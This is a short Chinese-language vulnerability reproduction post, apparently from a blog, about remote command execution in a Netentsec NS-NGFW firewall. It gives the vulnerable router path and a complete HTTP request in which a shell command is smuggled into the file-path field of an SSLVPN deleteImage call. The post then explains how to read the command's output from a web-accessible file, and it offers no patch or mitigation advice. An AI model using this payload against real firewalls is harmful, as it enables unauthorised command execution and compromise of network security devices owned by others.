网康NS-NGFW防火墙远程RCE 漏洞复现_/directdata/direct/router

漏洞点在

/directdata/direct/router
先访问ip加上上面的路径
具体包如下：

GET /directdata/direct/router HTTP/1.1
Host: 目标ip地址
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=4ijfeni9s39dkbmft8o9684084; ys-active_page=s%3A
Upgrade-Insecure-Requests: 1
Content-Length: 156

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;ls>/var/www/html/1.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
1
2
3
4
5
6
7
8
9
10
11
12

如图所示，执行了ls命令，并将返回结果放到1.txt中
访问1.txt,就可以看到命名执行后的内容。